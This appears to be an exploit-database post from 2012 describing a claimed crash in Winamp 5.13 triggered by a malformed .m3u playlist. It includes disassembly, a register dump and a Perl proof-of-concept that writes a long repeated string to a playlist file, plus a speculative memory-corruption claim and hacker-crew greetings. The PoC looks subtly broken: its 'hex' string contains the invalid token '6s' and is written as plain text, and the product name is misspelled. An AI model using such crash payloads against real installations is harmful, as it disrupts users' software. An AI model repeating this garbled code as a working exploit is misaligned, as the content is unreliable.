1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 _ __ __ __ 1 1 /' \ __ /'__`\ /\ \__ /'__`\ 0 0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1 1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0 0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1 1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0 0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1 1 \ \____/ >> Exploit database separated by exploit 0 0 \/___/ type (local, remote, DoS, etc.) 1 1 1 0 [x] Official Website: http://www.1337day.com 0 1 [x] Support E-mail : mr.inj3ct0r[at]gmail[dot]com 1 0 0 1 ========================================== 1 0 Dark-Puzzle From Inj3ct0r TEAM 1 1 ========================================== 0 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-1 # Exploit Title: Winmap 5.13 Full- Exception Handling Vulnerablity . # Author: Dark-Puzzle # Category : Local Exploit # Software Link : http://www.oldapps.com/winamp.php?old_winamp=214?download # Date: 25 June 2012 # Version: 5.13 Full Version , previous versions may be vulnerable . # Tested on: Windows Xp Sp2 . ---------------------------------------------------------- Understanding the exploit : *Executing file.m3u in Winamp 5.13 Full . *After debugging the program , I discovered that this was an Exception Handling error by Access Violation . registred in [EAX] Memory . Not By Division by zero here. diasembly 7C928FCE |. 57 PUSH EDI 7C928FCF |. 1BC0 SBB EAX,EAX 7C928FD1 |. F7D0 NOT EAX 7C928FD3 |. 25 40C1987C AND EAX,7C98C140 7C928FD8 |. 8BF8 MOV EDI,EAX 7C928FDA |. 8B46 10 MOV EAX,DWORD PTR DS:[ESI+10] 7C928FDD |. 3BC3 CMP EAX,EBX 7C928FDF |. 8945 FC MOV DWORD PTR SS:[LOCAL.1],EAX 7C928FE2 |. 0F84 9E000000 JE 7C929086 7C928FE8 |> 8B06 MOV EAX,DWORD PTR DS:[ESI] 7C928FEA |. FF40 10 INC DWORD PTR DS:[EAX+10] <<---- Access Violation Registers : ------------- EAX 35206534 ------------- ECX 00000000 EDX 00487D00 EBX 00000000 ESP 00D7FE00 EBP 00D7FE74 ESI 00487D00 EDI 00000000 ------------- EIP 7C928FEA ntdll.7C928FEA ------------- Error : Access Violation when writing to [35206544] - Application was unable to process exception . Access Violation. Unhandle exception in winmap.exe The Thing here is that EAX registered 35206534 , but the access violation was in [35206544] . Because , as we see here "INC DWORD PTR DS:[EAX+10]." We can fill some nops in our exploitation code , but I prefer not . ------------------------------------------------------------------- PoC : #!/usr/bin/perl my $file = "dark.m3u"; my $cr = "4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f"; open ($File, ">$file"); print $File $cr; close ($File); ----------------------------------------------------------------- A memorry corruption vulnerability maybe possible . ----------------------------------------------------------------- Dark-Puzzle (Souhail) . Follow me : fb.me/dark.puzzle Follow Moroccan Cyber Army : https://www.facebook.com/MAR.Cyber.Army Greetz to : M.C.A , Team-Hunter , Jigs@w , All Inj3ct0r team Members .... GREY HAT Mercy .